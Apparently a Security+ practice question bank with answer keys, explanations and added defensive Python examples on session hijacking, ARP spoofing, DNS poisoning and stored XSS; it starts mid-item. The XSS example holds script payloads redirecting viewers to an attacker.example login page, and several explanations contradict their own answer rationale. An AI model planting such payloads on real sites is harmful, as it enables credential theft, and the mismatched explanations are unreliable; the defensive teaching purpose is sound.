D. Phishing, because the attacker likely stole the user's password first.
Answer: A

Session hijacking is the best answer because the attacker is reusing a valid authenticated token rather than logging in normally. The token continues to work after a password reset, and the same token appears from different geographies in a short window. That strongly suggests the session itself was stolen and replayed, which bypasses authentication controls that only protect the login step.

Why this answer

Option A is correct because the scenario describes a stolen bearer token (session token) being reused from a different geographic location (VPN exit node) without re-authentication. This is classic session hijacking, where an attacker captures a valid session token (e.g., from a browser cookie) and replays it to impersonate the authenticated user. The fact that the token works even after a password reset and bypasses MFA confirms the attack is session hijacking, not credential theft or request forgery.

Exam trap

The trap here is that candidates confuse session hijacking with CSRF, but CSRF requires the victim's browser to send the request, whereas session hijacking involves the attacker directly using the stolen token from their own machine.

How to eliminate wrong answers

Option B is wrong because credential stuffing involves using many stolen username/password pairs against a login portal, but here the attacker already has a valid bearer token and does not need to guess passwords. Option C is wrong because cross-site request forgery (CSRF) tricks a user's browser into making unintended requests using their existing session, but the attacker here is directly using a stolen token from a different location, not exploiting the user's active session.
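Two checks a SIEM or auth service could run against the pattern above, as an added example that is not part of the original question set: the same bearer token seen from two countries within minutes, and a token issued before a forced password reset that is still accepted afterwards. The log layout, token ids and timestamps are constructed, not a vendor format.

```python
"""Added example: detection logic for the session-hijacking scenario above.
All log lines and token metadata below are constructed sample data."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: time, user, token id, country, source IP, request.
SAMPLE_LOG = """\
2024-05-02T09:00:05Z alice tok_7f3a9c US 203.0.113.10 GET /dashboard
2024-05-02T09:01:40Z alice tok_7f3a9c US 203.0.113.10 GET /reports
2024-05-02T09:04:12Z alice tok_7f3a9c NL 198.51.100.77 GET /export
2024-05-02T09:30:00Z bob   tok_c21e04 US 203.0.113.22 GET /dashboard
2024-05-02T10:30:00Z bob   tok_c21e04 DE 198.51.100.9  GET /dashboard
"""

# Constructed token metadata the auth service would hold (assumed layout).
TOKEN_ISSUED_AT = {
    "tok_7f3a9c": datetime(2024, 5, 2, 7, 30),   # issued before alice's reset
    "tok_c21e04": datetime(2024, 5, 2, 9, 25),
}
PASSWORD_RESET_AT = {"alice": datetime(2024, 5, 2, 8, 0)}


def parse_log(text):
    """Turn the sample lines into dicts with a real datetime for comparisons."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, token, country, ip, _rest = line.split(maxsplit=5)
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "user": user, "token": token, "country": country, "ip": ip,
        })
    return events


def impossible_travel(events, window=timedelta(minutes=5)):
    """Map token -> (country_a, country_b, user) for tokens whose consecutive
    uses come from different countries no more than `window` apart."""
    by_token = defaultdict(list)
    for e in events:
        by_token[e["token"]].append(e)
    flagged = {}
    for token, uses in by_token.items():
        uses.sort(key=lambda e: e["time"])
        for prev, cur in zip(uses, uses[1:]):
            if prev["country"] != cur["country"] and cur["time"] - prev["time"] <= window:
                flagged[token] = (prev["country"], cur["country"], cur["user"])
                break
    return flagged


def stale_after_reset(events, issued_at, reset_at):
    """Tokens used after the owner's forced password reset although they were
    issued before it. A reset should have invalidated them; if it did not, the
    server-side session store is the gap the scenario describes."""
    stale = set()
    for e in events:
        reset = reset_at.get(e["user"])
        issued = issued_at.get(e["token"])
        if reset and issued and issued < reset < e["time"]:
            stale.add(e["token"])
    return stale


def tokens_to_revoke(text=SAMPLE_LOG):
    """Union of both findings: the tokens an analyst would revoke first."""
    events = parse_log(text)
    return set(impossible_travel(events)) | stale_after_reset(
        events, TOKEN_ISSUED_AT, PASSWORD_RESET_AT)


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("impossible travel:", impossible_travel(evs))
    print("stale after reset:", stale_after_reset(evs, TOKEN_ISSUED_AT, PASSWORD_RESET_AT))
    print("revoke:", tokens_to_revoke())
```

Bob's two countries are an hour apart, so only alice's token is flagged; the reset check catches the same token independently of geography.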

212
MCQ · easy

A person wearing a contractor badge asks reception to let them into the office because they forgot their access card and say they are expected for a server maintenance visit. What social engineering technique is most likely?

A. Pretexting
B. Baiting
C. Smishing
D. Ransomware
Answer: A

Pretexting uses a fabricated story or identity to gain trust and access. In this case, the person invents a maintenance visit and forgotten badge story to convince reception to grant entry.

Why this answer

Pretexting is correct because the attacker creates a fabricated scenario (the 'pretext') of being a contractor on a server maintenance visit to gain unauthorized physical access. The use of a contractor badge and the claim of a forgotten access card are designed to exploit the receptionist's trust and willingness to help, bypassing security controls without technical hacking.

Exam trap

Cisco often tests the distinction between pretexting (fabricated scenario) and baiting (offering a lure), where candidates mistakenly choose baiting because they associate the 'forgotten card' with a 'bait' like a free item, but the core technique is the false identity and story.

How to eliminate wrong answers

Option B (Baiting) is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to trick a victim into performing an action, not fabricating a story for access. Option C (Smishing) is wrong because smishing is a form of phishing conducted via SMS text messages, not an in-person social engineering technique involving a badge and verbal request.

213
Multi-Select · medium

A help desk technician receives a phone call from someone claiming to be the VP of Finance. The caller says they are in an airport, forgot their phone, and need a password reset immediately. They also ask the technician to skip callback verification because a meeting starts in five minutes. Which two details are the strongest indicators of a pretexting or vishing attempt? Select two.

Select 2 answers
A. The caller claims an executive title and uses authority to pressure the technician
B. The call is routed through the company ticketing system with an approved change record
C. The caller asks the technician to bypass identity verification and callback procedures
D. The caller answers all security questions correctly after being prompted for them
E. The call occurs after normal business hours on a holiday weekend
Answers: A, C

Impersonating a senior executive is a common social engineering tactic because it creates authority pressure and makes the target more likely to comply quickly. In a help desk context, attackers often borrow a title that sounds urgent and important. That pressure is a strong sign the call may be a pretext rather than a legitimate request.

Why this answer

Option A is correct because the caller's use of an executive title (VP of Finance) and urgent authority pressure is a classic social engineering tactic known as pretexting. In a vishing (voice phishing) attack, the attacker fabricates a scenario to manipulate the technician into bypassing standard security procedures. This aligns with the SY0-701 domain on threats, vulnerabilities, and mitigations, specifically social engineering techniques.

Exam trap

The trap here is that candidates may take a correct response to the security questions (Option D) as a sign of legitimacy, but in vishing attacks the attacker often gathers personal data from OSINT or data breaches to answer such questions, making it a weak indicator compared to the direct authority pressure and the request to bypass verification.

214
MCQ · easy

A help desk technician receives a phone call from someone claiming to be a contractor. The caller says their MFA app was lost, asks the technician to enroll a new device immediately, and pressures them to ignore policy. What type of attack is this?

A. Phishing
B. Vishing
C. Smishing
D. Baiting
Answer: B

Vishing uses voice calls to pressure a target into revealing information or changing security settings.

Why this answer

This is a vishing (voice phishing) attack because the attacker uses a phone call to impersonate a contractor and socially engineer the technician into bypassing MFA enrollment policies. Vishing specifically exploits voice communication to manipulate victims, unlike phishing which uses email or malicious links.

Exam trap

The trap here is confusing vishing with phishing because both involve social engineering, but the key differentiator is the communication medium—voice (phone call) vs. electronic message (email/SMS).

How to eliminate wrong answers

Option A is wrong because phishing involves deceptive emails or messages with malicious links/attachments, not a direct phone call. Option C is wrong because smishing uses SMS text messages to trick victims, not voice calls. Option D is wrong because baiting relies on offering something enticing (e.g., a free USB drive) to lure victims into a trap, not a phone-based social engineering request.

215
MCQ · hard

Based on the exhibit, which finding should be remediated first?

A. Finding A
B. Finding B
C. Finding C
D. Finding D
Answer: A

Finding A combines internet exposure, remote code execution, and active exploitation in the wild, making it the most urgent risk even if another item has a slightly higher CVSS score. Exposure and exploitability matter more than score alone. A patch is available, so remediation can reduce the window of opportunity quickly. In Security+ style prioritization, reachable, actively exploited weaknesses on public-facing systems rise to the top.

Why this answer

Finding A indicates a critical vulnerability with a CVSS score of 9.8, which is the highest severity among the findings. Remediation should prioritize the most severe risk to minimize potential impact, as this vulnerability could allow remote code execution without authentication.

Exam trap

The trap here is that candidates might choose a finding based on the number of affected systems or a misleading description, rather than strictly prioritizing by CVSS severity score as CompTIA expects.

How to eliminate wrong answers

Option B is wrong because its CVSS score of 7.5 is lower than Finding A's 9.8, and while it represents a high-severity issue, it does not pose the same immediate risk of unauthenticated remote compromise. Option C is wrong because it has a CVSS score of 6.2, which is medium severity, and typically involves a local attack vector or requires user interaction, making it less urgent than a critical remote exploit. Option D is wrong because its CVSS score of 4.3 is low severity, often related to information disclosure or minor misconfigurations, and should be addressed after critical and high-severity findings.

216
MCQ · medium

A security analyst observes repeated outbound traffic from a single workstation to a known malicious IP address. The workstation's anti-malware software has reported no alerts, and the user claims to have only downloaded software from the company's approved application store. Which type of malware most likely explains this behavior?

A. Ransomware
B. Rootkit
C. Trojan horse
D. Polymorphic malware
Answer: C

Correct. A Trojan horse masquerades as benign software, often from a seemingly trusted source. It can evade signature-based anti-malware and silently establish outbound connections to a malicious IP for command-and-control, data exfiltration, or further payload delivery.

Why this answer

The Trojan horse is correct because it is a type of malware that disguises itself as legitimate software, often downloaded from trusted sources like an approved application store, to bypass security controls. Once installed, it can silently establish outbound connections to a command-and-control (C2) server, such as the known malicious IP address observed, without triggering anti-malware alerts if the Trojan is not yet in the signature database. This matches the scenario where the user downloaded from an approved store, the anti-malware reported no alerts, and the workstation is communicating with a malicious IP.

Exam trap

The trap here is that candidates may confuse a rootkit's stealth capabilities with the Trojan's social engineering vector, overlooking that the approved store download is a classic Trojan delivery method, not a rootkit's typical infection path.

How to eliminate wrong answers

Option A is wrong because ransomware typically announces its presence with a ransom note and encryption of files, not by silently generating repeated outbound traffic to a malicious IP without alerts. Option B is wrong because a rootkit is designed to hide its presence by modifying the operating system kernel or drivers, which would likely evade anti-malware detection but does not inherently explain the user downloading from an approved store; rootkits are usually installed via exploits or bundled with other malware, not typically disguised as a legitimate app from an approved store.

217
MCQ · medium

Several users on the same subnet report intermittent inability to reach the default gateway. A packet capture shows ARP replies mapping the gateway IP to a different MAC address, and the same host keeps sending those replies every few seconds. What attack is most likely?

A. Replay attack
B. ARP spoofing
C. DNS amplification
D. Man-in-the-middle via TLS downgrade
Answer: B

ARP spoofing, also called ARP poisoning, forges ARP replies so hosts associate the gateway IP with the attacker MAC address.

Why this answer

The correct answer is B, ARP spoofing. The symptoms—intermittent gateway unreachability, ARP replies mapping the gateway IP to a different MAC address, and repeated unsolicited ARP replies—are classic indicators of an ARP spoofing (also called ARP poisoning) attack. The attacker sends forged ARP replies to associate their own MAC address with the gateway IP, causing traffic destined for the gateway to be sent to the attacker instead, disrupting connectivity.

Exam trap

The trap here is that candidates may confuse ARP spoofing with a man-in-the-middle attack in general, but the question specifically describes ARP-level manipulation (forged ARP replies mapping the gateway IP to a different MAC), which is the defining characteristic of ARP spoofing, not a TLS downgrade or replay attack.

How to eliminate wrong answers

Option A is wrong because a replay attack involves capturing and retransmitting valid data packets (e.g., authentication tokens) to trick a system, not sending forged ARP replies to redirect traffic. Option C is wrong because a DNS amplification attack is a type of DDoS that uses open DNS resolvers to flood a target with large DNS responses, and it does not involve manipulating ARP tables or causing intermittent gateway reachability. Option D is wrong because a man-in-the-middle via TLS downgrade attack forces a connection to use a weaker TLS version or cipher, but it does not involve ARP spoofing or sending forged ARP replies; it operates at the transport/application layer, not the data link layer.
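A small detector for the pattern in this question, as an added example that is not part of the original material: it flags ARP replies that map the gateway IP to a MAC other than the known one and counts how many of them were unsolicited. The capture summary is constructed, and the expected gateway MAC is assumed to come from a DHCP or switch inventory.

```python
"""Added example: detecting repeated forged ARP replies for the gateway IP.
Capture lines and the known gateway MAC below are constructed sample data."""
from datetime import datetime

GATEWAY_IP = "10.0.0.1"
KNOWN_GATEWAY_MAC = "00:11:22:33:44:01"   # assumed inventory value

# Constructed capture summary: time, opcode, sender IP, sender MAC, target IP.
SAMPLE_ARP = """\
12:00:00.000 request 10.0.0.25 aa:bb:cc:00:00:25 10.0.0.1
12:00:00.002 reply   10.0.0.1  00:11:22:33:44:01 10.0.0.25
12:00:03.100 reply   10.0.0.1  de:ad:be:ef:00:99 10.0.0.25
12:00:06.100 reply   10.0.0.1  de:ad:be:ef:00:99 10.0.0.40
12:00:09.100 reply   10.0.0.1  de:ad:be:ef:00:99 10.0.0.25
12:00:15.000 reply   10.0.0.40 aa:bb:cc:00:00:40 10.0.0.25
"""


def parse_arp(text):
    """Parse the summary lines; times become seconds since the first record."""
    recs, base = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, op, sip, smac, tip = line.split()
        t = datetime.strptime(ts, "%H:%M:%S.%f")
        if base is None:
            base = t
        recs.append({"t": (t - base).total_seconds(), "op": op,
                     "sender_ip": sip, "sender_mac": smac.lower(), "target_ip": tip})
    return recs


def detect_arp_spoofing(records, gateway_ip=GATEWAY_IP, known_mac=KNOWN_GATEWAY_MAC,
                        solicit_window=1.0):
    """Return {rogue_mac: {"count", "unsolicited", "max_gap"}} for every MAC other
    than the known one that claims the gateway IP in a reply. A reply is
    unsolicited when its target did not ask for the gateway within
    `solicit_window` seconds before it; gratuitous replies repeating every few
    seconds are the hallmark of poisoning rather than a real gateway change."""
    requests = [r for r in records
                if r["op"] == "request" and r["target_ip"] == gateway_ip]
    findings = {}
    for r in records:
        if (r["op"] != "reply" or r["sender_ip"] != gateway_ip
                or r["sender_mac"] == known_mac.lower()):
            continue
        f = findings.setdefault(r["sender_mac"],
                                {"count": 0, "unsolicited": 0, "times": []})
        f["count"] += 1
        f["times"].append(r["t"])
        asked = any(q["sender_ip"] == r["target_ip"]
                    and 0 <= r["t"] - q["t"] <= solicit_window for q in requests)
        if not asked:
            f["unsolicited"] += 1
    for f in findings.values():
        ts = f.pop("times")
        f["max_gap"] = max((b - a for a, b in zip(ts, ts[1:])), default=0.0)
    return findings


def is_poisoning(findings, min_repeats=3):
    """Alert threshold: one rogue MAC, repeated, mostly unsolicited."""
    return any(f["count"] >= min_repeats and f["unsolicited"] >= 2
               for f in findings.values())


if __name__ == "__main__":
    found = detect_arp_spoofing(parse_arp(SAMPLE_ARP))
    print(found, "-> poisoning" if is_poisoning(found) else "-> clean")
```

On a switch the same evidence is what Dynamic ARP Inspection acts on; static ARP entries for the gateway on critical hosts close the gap where DAI is unavailable.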

218
MCQ · easy

A worker receives a text message from someone claiming to be the company's HR partner. The message says a benefits portal issue will be fixed only if the worker clicks a link and logs in right away. What type of attack is this most likely?

A. Smishing, because the attack is delivered by text message.
B. Watering hole, because the attacker compromised the HR partner's website.
C. Spoofing only, because the attacker copied the HR logo in the message.
D. Port scanning, because the attacker wants to find open services on the phone.
Answer: A

Smishing is phishing through SMS or similar text messaging, often using urgency and a trusted name to steal credentials or redirect victims.

Why this answer

This is smishing because the attack vector is a text message (SMS) that attempts to trick the recipient into clicking a malicious link and providing credentials. Smishing is a form of social engineering that exploits the trust in SMS communications, often impersonating a legitimate entity like HR to create urgency. The goal is credential theft, not technical exploitation of the phone's services.

Exam trap

CompTIA often tests the distinction between the delivery method (SMS = smishing) and the underlying technique (spoofing), so candidates mistakenly choose 'spoofing only' because they see a faked logo or sender ID, ignoring that the attack is defined by its vector.

How to eliminate wrong answers

Option B is wrong because a watering hole attack compromises a website frequently visited by the target group, not by sending a direct text message; the attacker does not compromise the HR partner's website here. Option C is wrong because spoofing alone is a technique (e.g., faking the sender ID or logo), but the full attack is smishing, which includes the social engineering delivery via SMS; the question asks for the attack type, not just one component. Option D is wrong because port scanning is a network reconnaissance technique to find open ports and services, not a method to trick a user into clicking a link via text message.

219
MCQ · medium

A security analyst is investigating a phishing campaign that specifically targets senior executives in a company. The emails appear to come from the CEO and request urgent wire transfers to a fraudulent account. Which of the following best describes this type of attack?

A. Whaling
B. Spear phishing
C. Vishing
D. Pharming
Answer: A

Correct. Whaling specifically targets senior executives or high-value individuals within an organization, often using urgent or authoritative requests to trick them into transferring money or revealing sensitive information.

Why this answer

This attack is whaling because it specifically targets senior executives (the 'big fish') with a fraudulent email impersonating the CEO to request urgent wire transfers. Whaling is a form of phishing that focuses on high-profile individuals within an organization, leveraging their authority and access to sensitive financial operations. The attack exploits the trust and urgency associated with executive communications to bypass standard security controls.

Exam trap

CompTIA often tests the distinction between whaling and spear phishing, where candidates mistakenly choose spear phishing because they overlook that whaling is a specific subtype targeting executives, not just any individual.

How to eliminate wrong answers

Option B (Spear phishing) is wrong because spear phishing targets specific individuals or groups but does not exclusively focus on senior executives; it is a broader category that includes whaling as a subset. Option C (Vishing) is wrong because vishing uses voice calls or VoIP to deceive victims, not email-based messages. Option D (Pharming) is wrong because pharming redirects users from legitimate websites to fraudulent ones by manipulating DNS or host files, not by sending deceptive emails.

220
MCQ · medium

A procurement clerk receives a text message from someone claiming to be a supplier account manager. The message says a recent payment failed and asks the clerk to update bank details through a link to a secure portal. What should the clerk do first?

A. Open the link and compare it with the supplier's branding
B. Reply to the text and ask the sender to confirm the request
C. Verify the request using a known supplier contact method before taking action
D. Forward the message to finance so they can decide whether it is legitimate
Answer: C

Out-of-band verification through a trusted phone number or established contact path is the safest way to confirm legitimacy.

Why this answer

Option C is correct because the clerk should independently verify the request using a known supplier contact method (e.g., a phone number on file) before taking any action. This prevents falling victim to a social engineering attack, such as a phishing or business email compromise (BEC) attempt, where the attacker spoofs the sender's identity to redirect payments. Verifying through an out-of-band channel ensures the request is legitimate, as the link in the message could lead to a credential-harvesting site or malware download.

Exam trap

The trap here is that candidates may choose Option D, thinking that forwarding to finance is a safe escalation, but the SY0-701 exam emphasizes that the first step is always independent verification using a trusted method, not delegating or relying on the suspicious communication channel.

How to eliminate wrong answers

Option A is wrong because opening the link and comparing branding is unsafe; the link could lead to a lookalike domain that mimics the supplier's portal, and merely comparing branding does not verify the sender's identity or the link's authenticity, as attackers can easily replicate logos and styles. Option B is wrong because replying to the text allows the attacker to continue the social engineering; the reply goes to the same compromised channel, and the attacker can simply confirm the request, providing no real verification. Option D is wrong because forwarding the message to finance shifts responsibility without verifying the request first; finance may also be deceived by the same spoofed message, and the clerk should independently verify before escalating.

221
MCQ · hard

Based on the exhibit, which issue should be remediated FIRST? The team can only fully fix one issue today. Management wants the choice that best reduces real-world risk, not just the highest severity score.

A. Internet-facing VPN appliance
B. Internal HR file server
C. Lab workstation
D. DMZ reporting server
Answer: A

This asset is externally reachable, has a known public exploit, and lacks compensating controls. That combination creates the highest immediate likelihood of compromise.

Why this answer

The Internet-facing VPN appliance is the highest priority because it is directly exposed to untrusted networks (the Internet), making it the most likely entry point for attackers. A compromise here could lead to full network access, bypassing all other security controls, which represents the greatest real-world risk regardless of its severity score.

Exam trap

The trap here is that candidates often fixate on the highest CVSS severity score (e.g., a critical vulnerability on the internal server) rather than considering the attack surface and likelihood of exploitation, which is the core of risk-based prioritization.

How to eliminate wrong answers

Option B (Internal HR file server) is wrong because it resides on the internal network and is not directly reachable from the Internet, so its exposure is limited to already-authenticated users; remediating it first would not reduce external attack surface. Option C (Lab workstation) is wrong because it is isolated in a lab environment, typically with restricted network access and no sensitive production data, making its compromise low-impact. Option D (DMZ reporting server) is wrong because while it is in a DMZ, it is not Internet-facing (it is behind the firewall and only accessible from internal or specific external sources), so its risk is lower than a directly exposed VPN gateway.

222
MCQ · hard

Based on the exhibit, what is the most likely explanation for the suspicious workstation activity?

A. Ransomware campaign
B. Fileless attack
C. Worm propagation
D. Rootkit persistence
Answer: B

The exhibit shows legitimate Windows tools launching hidden, encoded PowerShell from a scheduled task, with no dropped executable on disk. That pattern strongly suggests a fileless attack, where the payload runs primarily in memory and uses trusted utilities to reduce visibility. The periodic connections after execution also fit a lightweight backdoor or loader rather than a traditional malware binary.

Why this answer

The exhibit shows a PowerShell command that downloads and executes a payload directly in memory without writing to disk. This is a classic indicator of a fileless attack, where malicious code runs in volatile memory (e.g., via PowerShell, WMI, or macros) to evade traditional file-based antivirus detection. The use of `Invoke-Expression` (IEX) with a remote URL confirms the attack vector is fileless.

Exam trap

The trap here is that candidates see a PowerShell command and assume it is a worm or ransomware, but the key detail is the in-memory execution (no file written) which is the hallmark of a fileless attack, not the payload's ultimate goal.

How to eliminate wrong answers

Option A is wrong because ransomware typically encrypts files and leaves ransom notes, but the exhibit shows no evidence of file encryption or ransom demands—only a suspicious PowerShell download cradle. Option C is wrong because worm propagation requires self-replicating code that spreads across networks without user interaction, whereas the exhibit shows a single command executed on one workstation with no lateral movement indicators. Option D is wrong because rootkit persistence involves hiding processes or files at the kernel level (e.g., via driver hooks or MBR modification), but the exhibit shows a one-time in-memory execution with no persistence mechanism like scheduled tasks or registry run keys.

223
MCQ · hard

A facilities manager receives an SMS from "FedEx Delivery" saying a shipment for the research lab cannot clear security until the recipient verifies the package by signing in. The message includes the manager's initials and the warehouse code, and the link opens a cloned sign-in page. Which attack is most likely?

A. Smishing, because the attacker is using a text message to deliver a targeted credential lure.
B. Vishing, because the attacker is pretending to be a delivery service representative.
C. Spear phishing, because the message is targeted using the recipient's role and location.
D. Baiting, because the message offers a shipment verification reward to encourage action.
Answer: A

Smishing is the best answer because the attack arrives by SMS and is designed to push the victim to a fake login page. The personalized details make it more convincing, but the defining factor is the text-message delivery channel combined with credential harvesting. This is a common real-world approach for bypassing inbox filtering and exploiting mobile trust.

Why this answer

Smishing is a social engineering attack that uses SMS (Short Message Service) to deliver a fraudulent message designed to trick the recipient into revealing sensitive information. In this scenario, the attacker sends a text message impersonating FedEx, includes the manager's initials and warehouse code for personalization, and provides a link to a cloned sign-in page, which is the classic credential-harvesting mechanism of a smishing attack.

Exam trap

The trap here is that candidates confuse the targeted nature of the message (which suggests spear phishing) with the delivery vector (SMS), but the exam specifically tests the distinction between phishing subtypes based on the communication channel used.

How to eliminate wrong answers

Option B is wrong because vishing (voice phishing) involves a phone call, not an SMS text message; the attack described uses a text message with a link, not a voice call. Option C is wrong because spear phishing is a form of email-based phishing that targets a specific individual or organization; while the message is targeted, the delivery method is SMS, not email, making smishing the more precise classification.

224
MCQ · medium

A resolver log shows multiple clients querying the correct internal host name, but the DNS server starts returning an unexpected public IP address after a burst of unsolicited DNS responses from outside the network. Users are sent to a lookalike login page. What type of attack is most likely occurring?

A. DNS poisoning
B. Brute-force authentication
C. Port scanning
D. Packet sniffing
Answer: A

DNS poisoning is the best fit when incorrect DNS records or forged responses cause clients to resolve a legitimate name to a malicious address.

Why this answer

The scenario describes a DNS poisoning (also known as DNS cache poisoning) attack. The burst of unsolicited DNS responses from outside the network is the attacker injecting forged DNS records into the resolver's cache, causing it to map the correct internal host name to an unexpected public IP address. This redirects users to a lookalike login page, which is the classic outcome of DNS poisoning.

Exam trap

The trap here is that candidates may confuse DNS poisoning with packet sniffing because both involve network traffic, but only DNS poisoning actively modifies cached resolution data to redirect users.

How to eliminate wrong answers

Option B is wrong because brute-force authentication involves repeatedly trying passwords against a login interface, not manipulating DNS responses to redirect traffic. Option C is wrong because port scanning is used to discover open ports on a target system, not to alter DNS resolution or redirect users to a fake site. Option D is wrong because packet sniffing passively captures network traffic for analysis, but it does not inject forged DNS responses or modify the resolver's cache.
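The resolver-side checks that defeat the burst of forged responses described above, as an added example that is not part of the original question: a response is accepted only if it matches a query the resolver actually sent (transaction ID, source port, question) and arrives from the server that was asked. The records are a constructed, simplified stand-in for DNS messages, not wire format, and all names and addresses are constructed.

```python
"""Added example: cache-poisoning defences in a toy resolver.
Names, addresses and transaction IDs below are constructed sample values."""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Query:
    txid: int
    src_port: int      # randomised per query in a real resolver
    qname: str
    qtype: str
    server_ip: str     # the upstream server this query was sent to


@dataclass(frozen=True)
class Response:
    txid: int
    dst_port: int
    qname: str
    qtype: str
    from_ip: str
    answer: str


@dataclass
class Resolver:
    pending: dict = field(default_factory=dict)   # (txid, port) -> Query
    cache: dict = field(default_factory=dict)     # (qname, qtype) -> answer
    rejected: list = field(default_factory=list)  # (Response, reason)

    def send_query(self, q):
        self.pending[(q.txid, q.src_port)] = q

    def receive(self, r):
        """Accept a response only when it matches an outstanding query on every
        field an off-path attacker would have to guess, and came from the
        server we queried. Anything else is dropped and logged."""
        q = self.pending.get((r.txid, r.dst_port))
        if q is None:
            self.rejected.append((r, "no matching txid/port"))
            return False
        if (q.qname.lower(), q.qtype) != (r.qname.lower(), r.qtype):
            self.rejected.append((r, "question mismatch"))
            return False
        if q.server_ip != r.from_ip:
            self.rejected.append((r, "unexpected source"))
            return False
        del self.pending[(r.txid, r.dst_port)]
        self.cache[(q.qname.lower(), q.qtype)] = r.answer
        return True


def run_scenario():
    """Replay the question's burst of unsolicited responses against the resolver."""
    res = Resolver()
    legit = Query(txid=0x1A2B, src_port=50123, qname="portal.corp.example",
                  qtype="A", server_ip="10.0.0.53")
    res.send_query(legit)
    # Constructed burst from outside: txid guesses on the default port, then one
    # with the right txid and port but from the wrong source address.
    forged = [Response(t, 53, "portal.corp.example", "A", "203.0.113.66", "203.0.113.66")
              for t in range(0x1A20, 0x1A30)]
    forged.append(Response(0x1A2B, 50123, "portal.corp.example", "A",
                           "203.0.113.66", "203.0.113.66"))
    for f in forged:
        res.receive(f)
    genuine = Response(0x1A2B, 50123, "portal.corp.example", "A", "10.0.0.53", "10.1.5.20")
    accepted = res.receive(genuine)
    return res, accepted


if __name__ == "__main__":
    resolver, ok = run_scenario()
    print("genuine accepted:", ok, "| cache:", resolver.cache)
    print("forged rejected:", len(resolver.rejected))
```

DNSSEC validation adds the cryptographic check these matching rules cannot provide; the burst in the log would still show up in the rejected list either way.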

225
MCQ · medium

A company portal lets employees save a short profile bio. One employee enters a string containing script code, and later other users who view that profile are redirected to a fake sign-in page. What vulnerability best explains this behavior?

A. Reflected cross-site scripting, because the payload only appears in the current request response.
B. Stored cross-site scripting, because the malicious script is saved and served to other users later.
C. Command injection, because the script runs inside the web server process.
D. Session fixation, because the attacker wants the victim to use an old session ID.
Answer: B

Stored XSS occurs when malicious script is persisted by the application, such as in a profile field, comment, or message. Every user who later loads the page receives the harmful content. The redirection to a fake sign-in page shows that the script is executing in other users’ browsers, which makes this a stored, not reflected, attack. Proper output encoding and input handling are needed to prevent it.

Why this answer

The employee's profile bio is saved to the server and later served to other users who view the profile. This is the defining characteristic of stored (persistent) cross-site scripting (XSS): the malicious script is permanently stored on the target server and executed in the browsers of other users when they retrieve the stored data.

Exam trap

The trap here is confusing stored XSS with reflected XSS by focusing on the 'current request' aspect rather than recognizing that the payload is saved and served to other users later, which is the key differentiator.

How to eliminate wrong answers

Option A is wrong because reflected XSS requires the payload to be part of the current request (e.g., in a URL parameter or form input) and is not permanently stored; it only affects the user who submits the request. Option C is wrong because command injection targets the server-side operating system by injecting system commands (e.g., via shell metacharacters like ';' or '|'), not client-side script execution in a browser.
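The profile-bio store described in this question, as an added example that is not part of the original material, with the vulnerable renderer beside a hardened one: output encoding for the element body, a scheme check plus encoding for the link attribute, and a CSP header as a second layer. The usernames, template and payload strings are constructed for illustration.

```python
"""Added example: stored XSS in a profile bio, vulnerable and hardened forms.
Store, template, users and payload strings are constructed sample data."""
import html
from urllib.parse import urlsplit

PROFILES = {}   # username -> {"bio": str, "website": str}; in-memory stand-in for a DB


def save_profile(user, bio, website):
    """Persistence is what makes this stored rather than reflected XSS: the
    payload is written once and served to every later viewer of the profile."""
    PROFILES[user] = {"bio": bio, "website": website}


def render_profile_vulnerable(user):
    """Raw interpolation: any script in the bio runs in each viewer's browser."""
    p = PROFILES[user]
    return f'<div class="bio">{p["bio"]}</div><a href="{p["website"]}">site</a>'


def safe_url(url, allowed=("http", "https")):
    """Encoding alone does not make href safe: a javascript: URL survives
    html.escape intact. Allow only absolute http(s) URLs, else fall back to '#'."""
    url = url.strip()
    parts = urlsplit(url)
    return url if parts.scheme.lower() in allowed and parts.netloc else "#"


def render_profile_safe(user):
    """Encode for the HTML body context; validate then encode for the attribute."""
    p = PROFILES[user]
    bio = html.escape(p["bio"], quote=True)
    site = html.escape(safe_url(p["website"]), quote=True)
    return f'<div class="bio">{bio}</div><a href="{site}">site</a>'


SECURITY_HEADERS = {
    # Defence in depth: without 'unsafe-inline' the browser refuses inline
    # script even if an encoding step is missed somewhere else in the app.
    "Content-Security-Policy": "default-src 'self'; script-src 'self'",
}


def contains_live_script(markup):
    """Crude comparison check: an unescaped <script> tag or javascript: link."""
    low = markup.lower()
    return "<script" in low or 'href="javascript:' in low


# Constructed payloads matching the question: a bio that redirects viewers.
PAYLOAD_BIO = "<script>location='https://attacker.example/login'</script>"
PAYLOAD_SITE = "javascript:location='https://attacker.example/login'"


def demo():
    """Return (vulnerable_html, safe_html) for the same stored profile."""
    save_profile("mallory", PAYLOAD_BIO, PAYLOAD_SITE)
    return render_profile_vulnerable("mallory"), render_profile_safe("mallory")


if __name__ == "__main__":
    vulnerable, safe = demo()
    print("vulnerable:", vulnerable)
    print("safe:      ", safe)
```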
